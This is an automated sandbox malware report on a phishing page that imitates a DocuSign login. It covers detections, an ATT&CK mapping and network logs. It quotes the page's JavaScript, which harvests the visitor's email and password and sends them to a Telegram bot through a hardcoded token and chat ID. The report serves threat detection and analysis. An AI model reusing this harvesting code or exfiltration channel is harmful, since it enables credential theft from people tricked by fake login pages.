
Windows Analysis Report
http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
Analysis ID:1591502

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Levels: clean, suspicious, malicious]
  • System is w10x64
  • chrome.exe (PID: 4392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_44 | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

Source | Rule | Description | Author | Strings
1.0.pages.csv | JoeSecurity_HtmlPhish_64 | Yara detected HtmlPhish_64 | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
        No Sigma rule has matched
        No Suricata rule has matched


        AV Detection

        Source: http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, Avira URL Cloud: detection malicious, Label: malware

        Phishing

        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, Joe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-35a1d927529e4c9684409537cf8ff63f.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a cloud service provider, which is often used in phishing attempts., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, Page Title: DocuSign Login - Enter your password to sign in
        Source: Yara match, File source: 1.0.pages.csv, type: HTML
        Source: Yara match, File source: dropped/chromecache_44, type: DROPPED
        Source: 0.1.id.script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: Number of links: 0
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: On click: sendEmail()
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: <input type="password" .../> found
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: No <meta name="author".. found
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html, HTTP Parser: No <meta name="copyright".. found
        Source: unknown, HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49836 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49923 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50005 version: TLS 1.2
        Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknown, TCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: global traffic, HTTP traffic detected:
          GET /docu/e_protocol.html HTTP/1.1
          Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
          Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
        Source: global traffic, HTTP traffic detected:
          GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
          Host: www.continentalsports.co.uk
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: cross-site
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
        Source: global traffic, HTTP traffic detected:
          GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
          Host: www.continentalsports.co.uk
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
        Source: global traffic, HTTP traffic detected:
          GET /docu/e_protocol.html HTTP/1.1
          Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
          Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
        Source: global traffic, DNS traffic detected: DNS query: www.google.com
        Source: global traffic, DNS traffic detected: DNS query: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
        Source: global traffic, DNS traffic detected: DNS query: www.continentalsports.co.uk
        Source: chromecache_44.3.dr, String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_44.3.dr, String found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_44.3.dr, String found in binary or memory: https://logo.clearbit.com/
        Source: chromecache_44.3.dr, String found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
        Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknown, Network traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknown, Network traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknown, Network traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknown, Network traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknown, Network traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49923
        Source: unknown, Network traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49745
        Source: classification engine, Classification label: mal92.phis.win@18/10@10/6
        Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: unknown unknown
        Source: Window Recorder, Window detected: More than 3 window changes detected
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
[Behavior graph. ID: 1591502; URL: http://pub-35a1d927529e4c96...; Startdate: 15/01/2025; Architecture: WINDOWS; Score: 92]

Source | Detection | Scanner | Label | Link
http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html | 100% | Avira URL Cloud | malware |

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | 0% | Avira URL Cloud | safe |
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | 0% | Avira URL Cloud | safe |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.185.228 | true | false | | high
pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | 172.66.0.235 | true | true | | unknown
www.continentalsports.co.uk | 95.154.228.177 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html | true | | unknown
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | false | Avira URL Cloud: safe | unknown
http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot$ | chromecache_44.3.dr | false | | high
https://logo.clearbit.com/ | chromecache_44.3.dr | false | | high
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | chromecache_44.3.dr | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.228 | www.google.com | United States | | 15169 | GOOGLEUS | false
95.154.228.177 | www.continentalsports.co.uk | United Kingdom | | 20860 | IOMART-ASGB | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
172.66.0.235 | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | United States | | 13335 | CLOUDFLARENETUS | true

                      IP
                      192.168.2.4
                      192.168.2.6
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591502
                      Start date and time:2025-01-15 01:43:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 1s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@18/10@10/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.238, 64.233.167.84, 142.250.184.206, 172.217.18.110, 172.217.16.206, 142.250.184.234, 142.250.184.202, 216.58.212.138, 172.217.16.202, 142.250.186.42, 172.217.18.106, 142.250.185.74, 172.217.23.106, 172.217.16.138, 142.250.185.106, 216.58.206.74, 172.217.18.10, 142.250.74.202, 216.58.212.170, 142.250.185.138, 142.250.186.138, 142.250.186.74, 2.17.190.73, 199.232.214.172, 172.217.18.14, 142.250.185.110, 142.250.186.174, 142.250.186.46, 142.250.185.206, 142.250.186.163, 216.58.206.78, 199.232.210.172, 13.107.246.45, 2.23.242.162, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      No simulations
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:HwT:QT
                      MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                      SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                      SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                      SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmnL3NTXrWGSxIFDc5BTHo=?alt=proto
                      Preview:CgkKBw3OQUx6GgA=
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:downloaded
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      URL:https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:dropped
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:downloaded
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                      No static file info

                      Download Network PCAP: filteredfull

                      • Total Packets: 197
                      • 443 (HTTPS)
                      • 80 (HTTP)
                      • 53 (DNS)
                      Jan 15, 2025 01:44:08.657150984 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:08.657187939 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:08.817097902 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.817150116 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:08.817291021 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.818321943 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.818335056 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.410478115 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.440186977 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.440212965 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.441817045 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.441905022 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442504883 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442590952 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.442816973 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442825079 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.492927074 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.605918884 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605945110 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605953932 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605968952 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605999947 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.606036901 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.606054068 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.606057882 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.606096983 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.607395887 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.607412100 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.622586012 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.622657061 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.625396967 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.625410080 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.625683069 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.630095005 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.630541086 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.630547047 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.630903006 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.675323963 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.809160948 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.809293985 CET4434975640.115.3.253192.168.2.6
